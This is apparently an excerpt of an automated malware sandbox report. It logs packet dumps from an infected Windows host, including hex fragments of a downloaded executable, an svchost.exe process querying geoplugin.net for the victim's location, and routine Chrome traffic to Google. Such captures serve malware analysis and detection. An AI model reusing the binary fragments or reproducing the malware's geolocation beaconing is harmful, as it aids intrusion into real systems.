                                                                                                                                              May 2, 2024 04:54:53.193828106 CEST1289INData Raw: 48 04 eb ee 55 8b ec b8 04 00 01 00 e8 ec eb 03 00 56 8d 45 fc 8b f2 50 8d 85 fc ff fe ff 50 68 ff 7f 00 00 ff 31 ff 15 68 c3 49 00 8b 45 fc 85 c0 74 05 33 c9 66 89 08 8d 8d fc ff fe ff e8 11 00 00 00 8d 85 fc ff fe ff 8b ce 50 e8 b3 37 00 00 5e
                                                                                                                                              Data Ascii: HUVEPPh1hIEt3fP7^VVYtf|F\u3fLF^UVW3FO;Qu_^]USVWueYN3C;FPiq?PFuCP~3N_fH
                                                                                                                                              May 2, 2024 04:54:53.193891048 CEST1289INData Raw: 50 e8 de ea 01 00 83 c4 0c 39 9e 98 01 00 00 75 0b a1 e4 13 4d 00 89 86 98 01 00 00 39 9e a4 01 00 00 75 11 a1 e8 13 4d 00 89 86 a4 01 00 00 89 86 a8 01 00 00 39 9e b0 01 00 00 75 0b a1 ec 13 4d 00 89 86 b0 01 00 00 8d 9e a0 01 00 00 53 8d be 9c
                                                                                                                                              Data Ascii: P9uM9uM9uMSW[Md$$D$F@D$D$D$ qD$$=hMD$PjIhM_^[]U=hMVhL$#)=
                                                                                                                                              May 2, 2024 04:54:53.193905115 CEST1289INData Raw: 89 5f 08 89 5f 0c 89 5f 10 89 5f 14 89 5f 4c 66 89 1f e8 64 2a 00 00 8d 4f 28 e8 7a da ff ff 39 5f 58 0f 87 f6 f6 03 00 8d 4f 50 5f 5b e9 3e da ff ff 50 e8 77 c0 01 00 59 eb b9 55 8b ec 53 8b 5d 08 83 e3 01 f6 45 08 02 56 8b f1 0f 84 e9 f6 03 00
                                                                                                                                              Data Ascii: _____Lfd*O(z9_XOP_[>PwYUS]EVWhA@~7jV&tQWYY_^[]VWj^$MZu MMrZMhZM^ZMTZMJZM@Z_M^4


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              1192.168.2.2249184178.237.33.50803680C:\Windows\SysWOW64\svchost.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              May 2, 2024 04:57:13.480273008 CEST71OUTGET /json.gp HTTP/1.1
                                                                                                                                              Host: geoplugin.net
                                                                                                                                              Cache-Control: no-cache
                                                                                                                                              May 2, 2024 04:57:13.649221897 CEST1173INHTTP/1.1 200 OK
                                                                                                                                              date: Thu, 02 May 2024 02:57:13 GMT
                                                                                                                                              server: Apache
                                                                                                                                              content-length: 965
                                                                                                                                              content-type: application/json; charset=utf-8
                                                                                                                                              cache-control: public, max-age=300
                                                                                                                                              access-control-allow-origin: *
                                                                                                                                              Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 31 39 31 2e 39 36 2e 31 35 30 2e 32 32 35 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 32 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 [TRUNCATED]
                                                                                                                                              Data Ascii: { "geoplugin_request":"191.96.150.225", "geoplugin_status":200, "geoplugin_delay":"2ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"New York", "geoplugin_region":"New York", "geoplugin_regionCode":"NY", "geoplugin_regionName":"New York", "geoplugin_areaCode":"", "geoplugin_dmaCode":"501", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"40.7123", "geoplugin_longitude":"-74.0068", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              0192.168.2.2249162172.217.1.44432960C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2024-05-02 02:56:03 UTC330OUTGET /chrome/whats-new/m109?internal=true HTTP/1.1
                                                                                                                                              Host: www.google.com
                                                                                                                                              Connection: keep-alive
                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              2024-05-02 02:56:04 UTC686INHTTP/1.1 404 Not Found
                                                                                                                                              Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                              Accept-CH: Sec-Ch-Ua-Full-Version-List, Sec-Ch-Ua-Platform, Sec-Ch-Ua-Platform-Version, Sec-CH-Prefers-Reduced-Motion
                                                                                                                                              Critical-CH: Sec-Ch-Ua-Full-Version-List, Sec-Ch-Ua-Platform, Sec-Ch-Ua-Platform-Version, Sec-CH-Prefers-Reduced-Motion
                                                                                                                                              Vary: Accept-Encoding, Sec-Ch-Ua-Full-Version-List, Sec-Ch-Ua-Platform, Sec-Ch-Ua-Platform-Version, Sec-CH-Prefers-Reduced-Motion
                                                                                                                                              Date: Thu, 02 May 2024 02:56:04 GMT
                                                                                                                                              Server: sffe
                                                                                                                                              Content-Length: 187622
                                                                                                                                              X-XSS-Protection: 0
                                                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                              Connection: close
                                                                                                                                              2024-05-02 02:56:04 UTC569INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 39 20 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 20 69 65 39 20 64 69 72 2d 6c 74 72 22 20 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 22 6c 74 72 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 20 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 20 69 65 38 20 64 69 72 2d 6c 74 72 22 20 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 22 6c 74 72 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 20 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 20 69 65 37 20 64 69 72 2d 6c 74 72 22 20 20 6c 61 6e 67 3d 22
                                                                                                                                              Data Ascii: <!DOCTYPE html>...[if IE 9 ]> <html class="no-js ie ie9 dir-ltr" lang="en" dir="ltr"> <![endif]-->...[if IE 8 ]> <html class="no-js ie ie8 dir-ltr" lang="en" dir="ltr"> <![endif]-->...[if IE 7 ]> <html class="no-js ie ie7 dir-ltr" lang="
                                                                                                                                              2024-05-02 02:56:04 UTC1255INData Raw: 22 63 6f 6e 74 65 6e 74 2d 6c 61 6e 67 75 61 67 65 22 20 63 6f 6e 74 65 6e 74 3d 22 65 6e 2d 75 73 22 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 74 6f 6f 6c 73 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2d 61 6e 61 6c 79 74 69 63
                                                                                                                                              Data Ascii: "content-language" content="en-us"> <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin> <link rel="preconnect" href="https://tools.google.com" > <link rel="preconnect" href="https://www.google-analytic
                                                                                                                                              2024-05-02 02:56:04 UTC1255INData Raw: 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 73 69 7a 65 73 3d 22 33 32 78 33 32 22 20 68 72 65 66 3d 22 2f 63 68 72 6f 6d 65 2f 73 74 61 74 69 63 2f 69 6d 61 67 65 73 2f 66 61 76 69 63 6f 6e 73 2f 66 61 76 69 63 6f 6e 2d 33 32 78 33 32 2e 70 6e 67 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 73 69 7a 65 73 3d 22 39 36 78 39 36 22 20 68 72 65 66 3d 22 2f 63 68 72 6f 6d 65 2f 73 74 61 74 69 63 2f 69 6d 61 67 65 73 2f 66 61 76 69 63 6f 6e 73 2f 66 61 76 69 63 6f 6e 2d 39 36 78 39 36 2e 70 6e 67 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72
                                                                                                                                              Data Ascii: <link rel="shortcut icon" type="image/png" sizes="32x32" href="/chrome/static/images/favicons/favicon-32x32.png"> <link rel="icon" type="image/png" sizes="96x96" href="/chrome/static/images/favicons/favicon-96x96.png"> <link r
                                                                                                                                              2024-05-02 02:56:04 UTC1255INData Raw: 63 2f 69 6d 61 67 65 73 2f 66 61 76 69 63 6f 6e 73 2f 61 70 70 6c 65 2d 69 63 6f 6e 2d 31 34 34 78 31 34 34 2e 70 6e 67 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 73 69 7a 65 73 3d 22 31 35 32 78 31 35 32 22 20 68 72 65 66 3d 22 2f 63 68 72 6f 6d 65 2f 73 74 61 74 69 63 2f 69 6d 61 67 65 73 2f 66 61 76 69 63 6f 6e 73 2f 61 70 70 6c 65 2d 69 63 6f 6e 2d 31 35 32 78 31 35 32 2e 70 6e 67 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 73 69 7a 65 73 3d 22 31 38 30 78 31 38 30 22 20 68 72
                                                                                                                                              Data Ascii: c/images/favicons/apple-icon-144x144.png"> <link rel="apple-touch-icon" type="image/png" sizes="152x152" href="/chrome/static/images/favicons/apple-icon-152x152.png"> <link rel="apple-touch-icon" type="image/png" sizes="180x180" hr
                                                                                                                                              2024-05-02 02:56:04 UTC1255INData Raw: 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 69 6d 61 67 65 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 63 68 72 6f 6d 65 2f 73 74 61 74 69 63 2f 69 6d 61 67 65 73 2f 63 68 72 6f 6d 65 2d 6c 6f 67 6f 2e 73 76 67 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 6c 6f 63 61 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 65 6e 5f 55 53 22 3e 20 20 3c 21 2d 2d 5b 69 66 20 28 67 74 65 20 49 45 20 31 30 29 7c 21 28 49 45 29 5d 3e 3c 21 2d 2d 3e 20 3c 73 63 72 69 70 74 3e 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 2e 69 6e 64 65 78 4f 66 28 27 4d 53 49 45 20 31 30 2e 30 27 29 20 3d 3d 3d 20 2d 31
                                                                                                                                              Data Ascii: <meta property="og:image" content="https://www.google.com/chrome/static/images/chrome-logo.svg"> <meta property="og:locale" content="en_US"> ...[if (gte IE 10)|!(IE)]>...> <script>navigator.userAgent.indexOf('MSIE 10.0') === -1
                                                                                                                                              2024-05-02 02:56:04 UTC1255INData Raw: 72 63 3d 22 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 6a 73 2f 67 77 65 62 2f 61 6e 61 6c 79 74 69 63 73 2f 61 75 74 6f 74 72 61 63 6b 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 3e 0a 20 20 76 61 72 20 67 61 43 6f 6f 6b 69 65 50 61 74 68 20 3d 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 70 61 74 68 6e 61 6d 65 2e 73 75 62 73 74 72 69 6e 67 28 30 2c 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 70 61 74 68 6e 61 6d 65 2e 69 6e 64 65 78 4f 66 28 22 2f 63 68 72 6f 6d 65 2f 22 29 20 2b 20 38 29 3b 0a 20 20 77 69 6e 64 6f 77 2e 67 61 20 3d 20 6e 65 77 20 67 77 65 62 2e 61 6e 61 6c 79 74 69 63 73 2e 41 75 74 6f 54 72 61 63 6b 28 7b 0a 20 20 20 20 70 72 6f 66 69 6c 65 3a 20 27 55 41
                                                                                                                                              Data Ascii: rc="//www.google.com/js/gweb/analytics/autotrack.js"></script> <script> var gaCookiePath = window.location.pathname.substring(0, window.location.pathname.indexOf("/chrome/") + 8); window.ga = new gweb.analytics.AutoTrack({ profile: 'UA
                                                                                                                                              2024-05-02 02:56:04 UTC1255INData Raw: 65 72 2c 6e 61 76 2c 73 65 63 74 69 6f 6e 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 7d 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 65 6d 3b 6d 61 72 67 69 6e 3a 30 2e 36 37 65 6d 20 30 7d 66 69 67 63 61 70 74 69 6f 6e 2c 66 69 67 75 72 65 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 7d 66 69 67 75 72 65 7b 6d 61 72 67 69 6e 3a 31 65 6d 20 34 30 70 78 7d 68 72 7b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 63 6f 6e 74 65 6e 74 2d 62 6f 78 3b 62 6f 78 2d 73 69 7a 69 6e 67 3a 63 6f 6e 74 65 6e 74 2d 62 6f 78 3b 68 65 69 67 68 74 3a 30 3b 6f 76 65 72 66 6c 6f 77 3a 76 69 73 69 62 6c 65 7d 6d 61 69 6e 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 7d 70 72 65 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 6d 6f 6e 6f 73 70 61 63 65 2c 20 6d 6f 6e 6f 73 70 61 63 65
                                                                                                                                              Data Ascii: er,nav,section{display:block}h1{font-size:2em;margin:0.67em 0}figcaption,figure{display:block}figure{margin:1em 40px}hr{-webkit-box-sizing:content-box;box-sizing:content-box;height:0;overflow:visible}main{display:block}pre{font-family:monospace, monospace
                                                                                                                                              2024-05-02 02:56:04 UTC1255INData Raw: 62 6d 69 74 22 5d 3a 3a 2d 6d 6f 7a 2d 66 6f 63 75 73 2d 69 6e 6e 65 72 7b 62 6f 72 64 65 72 2d 73 74 79 6c 65 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 3a 30 7d 62 75 74 74 6f 6e 3a 2d 6d 6f 7a 2d 66 6f 63 75 73 72 69 6e 67 2c 5b 74 79 70 65 3d 22 62 75 74 74 6f 6e 22 5d 3a 2d 6d 6f 7a 2d 66 6f 63 75 73 72 69 6e 67 2c 5b 74 79 70 65 3d 22 72 65 73 65 74 22 5d 3a 2d 6d 6f 7a 2d 66 6f 63 75 73 72 69 6e 67 2c 5b 74 79 70 65 3d 22 73 75 62 6d 69 74 22 5d 3a 2d 6d 6f 7a 2d 66 6f 63 75 73 72 69 6e 67 7b 6f 75 74 6c 69 6e 65 3a 31 70 78 20 64 6f 74 74 65 64 20 42 75 74 74 6f 6e 54 65 78 74 7d 69 6e 70 75 74 7b 6f 76 65 72 66 6c 6f 77 3a 76 69 73 69 62 6c 65 7d 5b 74 79 70 65 3d 22 63 68 65 63 6b 62 6f 78 22 5d 2c 5b 74 79 70 65 3d 22 72 61 64 69 6f 22 5d 7b 2d 77
                                                                                                                                              Data Ascii: bmit"]::-moz-focus-inner{border-style:none;padding:0}button:-moz-focusring,[type="button"]:-moz-focusring,[type="reset"]:-moz-focusring,[type="submit"]:-moz-focusring{outline:1px dotted ButtonText}input{overflow:visible}[type="checkbox"],[type="radio"]{-w
                                                                                                                                              2024-05-02 02:56:04 UTC1255INData Raw: 64 2d 6c 69 6e 6b 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 2e 63 68 72 2d 6d 6f 64 61 6c 2e 73 68 6f 77 2c 2e 63 68 72 2d 6d 6f 64 61 6c 20 2e 73 68 6f 77 2c 2e 63 68 61 6e 6e 65 6c 2d 70 61 67 65 20 2e 63 68 72 2d 64 6f 77 6e 6c 6f 61 64 2d 6c 69 6e 6b 2e 73 68 6f 77 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 20 21 69 6d 70 6f 72 74 61 6e 74 7d 40 2d 77 65 62 6b 69 74 2d 6b 65 79 66 72 61 6d 65 73 20 63 61 72 64 2d 66 61 64 65 2d 75 70 7b 66 72 6f 6d 7b 6f 70 61 63 69 74 79 3a 30 3b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 59 28 2d 38 30 70 78 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 59 28 2d 38 30 70 78 29 7d 74 6f 7b 6f 70 61 63 69 74 79 3a 31 3b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f
                                                                                                                                              Data Ascii: d-link{display:none}.chr-modal.show,.chr-modal .show,.channel-page .chr-download-link.show{display:block !important}@-webkit-keyframes card-fade-up{from{opacity:0;-webkit-transform:translateY(-80px);transform:translateY(-80px)}to{opacity:1;-webkit-transfo
                                                                                                                                              2024-05-02 02:56:04 UTC1255INData Raw: 3a 30 3b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 59 28 31 30 30 70 78 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 59 28 31 30 30 70 78 29 7d 74 6f 7b 6f 70 61 63 69 74 79 3a 31 3b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 59 28 30 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 59 28 30 29 7d 7d 40 2d 77 65 62 6b 69 74 2d 6b 65 79 66 72 61 6d 65 73 20 66 61 64 65 2d 6f 75 74 2d 64 6f 77 6e 7b 66 72 6f 6d 7b 6f 70 61 63 69 74 79 3a 31 3b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 59 28 30 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 59 28 30 29 7d 74 6f 7b 6f 70 61 63 69 74 79 3a 30 3b 2d
                                                                                                                                              Data Ascii: :0;-webkit-transform:translateY(100px);transform:translateY(100px)}to{opacity:1;-webkit-transform:translateY(0);transform:translateY(0)}}@-webkit-keyframes fade-out-down{from{opacity:1;-webkit-transform:translateY(0);transform:translateY(0)}to{opacity:0;-


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              1192.168.2.2249166172.217.1.44432960C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2024-05-02 02:56:04 UTC837OUTGET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1
                                                                                                                                              Host: www.google.com
                                                                                                                                              Connection: keep-alive
                                                                                                                                              X-Client-Data: CIa2yQEIorbJAQipncoBCKj3ygEIlqHLAQiFoM0BCNy9zQEIuMjNAQ==
                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Cookie: CONSENT=PENDING+962; SOCS=CAESHAgCEhJnd3NfMjAyMzA4MDEtMF9SQzMaAmVuIAEaBgiAi8amBg; __Secure-ENID=14.SE=LM-NkPAvbCtuNhK73uRS1U27fKMegq7R6_Ue_GnOGI1dekNKandC6Dto1fKS9ocnnyUmf2MAXGM269U9HhkgndYLxWy3FrZaGzh_yODdv1ouU12fBCNmRhMUwM3dzKbRlYRnbKhIQz9fV5WGdCRRjXQx5RGii6FbIw100Hc46oWQ6bysmy2hqA
                                                                                                                                              2024-05-02 02:56:05 UTC1191INHTTP/1.1 200 OK
                                                                                                                                              Date: Thu, 02 May 2024 02:56:04 GMT
                                                                                                                                              Pragma: no-cache
                                                                                                                                              Expires: -1
                                                                                                                                              Cache-Control: no-cache, must-revalidate
                                                                                                                                              Content-Type: text/javascript; charset=UTF-8
                                                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                                                              Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-33jPA5iP7hHE-UUbLr0jeg' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/cdt1
                                                                                                                                              Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                              Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/cdt1"}]}
                                                                                                                                              Accept-CH: Sec-CH-UA-Platform
                                                                                                                                              Accept-CH: Sec-CH-UA-Platform-Version
                                                                                                                                              Accept-CH: Sec-CH-UA-Full-Version
                                                                                                                                              Accept-CH: Sec-CH-UA-Arch
                                                                                                                                              Accept-CH: Sec-CH-UA-Model
                                                                                                                                              Accept-CH: Sec-CH-UA-Bitness
                                                                                                                                              Accept-CH: Sec-CH-UA-Full-Version-List
                                                                                                                                              Accept-CH: Sec-CH-UA-WoW64
                                                                                                                                              Permissions-Policy: unload=()
                                                                                                                                              Content-Disposition: attachment; filename="f.txt"
                                                                                                                                              Server: gws
                                                                                                                                              X-XSS-Protection: 0
                                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                              Accept-Ranges: none
                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                              Connection: close
                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                              2024-05-02 02:56:05 UTC64INData Raw: 33 31 32 0d 0a 29 5d 7d 27 0a 5b 22 22 2c 5b 22 70 73 20 70 6c 75 73 20 6d 61 79 20 32 30 32 34 20 6d 6f 6e 74 68 6c 79 20 67 61 6d 65 73 22 2c 22 73 74 61 72 20 77 61 72 73 20 62 61 64 20 62
                                                                                                                                              Data Ascii: 312)]}'["",["ps plus may 2024 monthly games","star wars bad b
                                                                                                                                              2024-05-02 02:56:05 UTC729INData Raw: 61 74 63 68 20 73 65 61 73 6f 6e 20 33 22 2c 22 61 6d 74 72 61 6b 20 62 6f 72 65 61 6c 69 73 20 74 72 61 69 6e 73 22 2c 22 65 64 6d 6f 6e 74 6f 6e 20 6f 69 6c 65 72 73 20 76 73 20 6b 69 6e 67 73 20 70 72 65 64 69 63 74 69 6f 6e 22 2c 22 6f 6b 6c 61 68 6f 6d 61 20 74 6f 72 6e 61 64 6f 65 73 22 2c 22 73 73 69 20 63 68 65 63 6b 73 22 2c 22 70 6f 73 74 20 6d 61 6c 6f 6e 65 20 6d 6f 72 67 61 6e 20 77 61 6c 6c 65 6e 20 63 6f 6e 63 65 72 74 22 2c 22 61 70 70 6c 65 20 69 70 68 6f 6e 65 20 61 6c 61 72 6d 73 22 5d 2c 5b 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 5d 2c 5b 5d 2c 7b 22 67 6f 6f 67 6c 65 3a 63 6c 69 65 6e 74 64 61 74 61 22 3a 7b 22 62 70 63 22 3a 66 61 6c 73 65 2c 22 70 72 65 22 3a 30 2c 22 74 6c 77 22 3a 66 61 6c 73 65 7d 2c
                                                                                                                                              Data Ascii: atch season 3","amtrak borealis trains","edmonton oilers vs kings prediction","oklahoma tornadoes","ssi checks","post malone morgan wallen concert","apple iphone alarms"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"pre":0,"tlw":false},
                                                                                                                                              2024-05-02 02:56:05 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                              Data Ascii: 0


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              2192.168.2.2249169172.217.1.44432960C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2024-05-02 02:56:05 UTC837OUTGET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1
                                                                                                                                              Host: www.google.com
                                                                                                                                              Connection: keep-alive
                                                                                                                                              X-Client-Data: CIa2yQEIorbJAQipncoBCKj3ygEIlqHLAQiFoM0BCNy9zQEIuMjNAQ==
                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Cookie: CONSENT=PENDING+962; SOCS=CAESHAgCEhJnd3NfMjAyMzA4MDEtMF9SQzMaAmVuIAEaBgiAi8amBg; __Secure-ENID=14.SE=LM-NkPAvbCtuNhK73uRS1U27fKMegq7R6_Ue_GnOGI1dekNKandC6Dto1fKS9ocnnyUmf2MAXGM269U9HhkgndYLxWy3FrZaGzh_yODdv1ouU12fBCNmRhMUwM3dzKbRlYRnbKhIQz9fV5WGdCRRjXQx5RGii6FbIw100Hc46oWQ6bysmy2hqA
                                                                                                                                              2024-05-02 02:56:05 UTC1703INHTTP/1.1 200 OK
                                                                                                                                              Date: Thu, 02 May 2024 02:56:05 GMT
                                                                                                                                              Pragma: no-cache
                                                                                                                                              Expires: -1
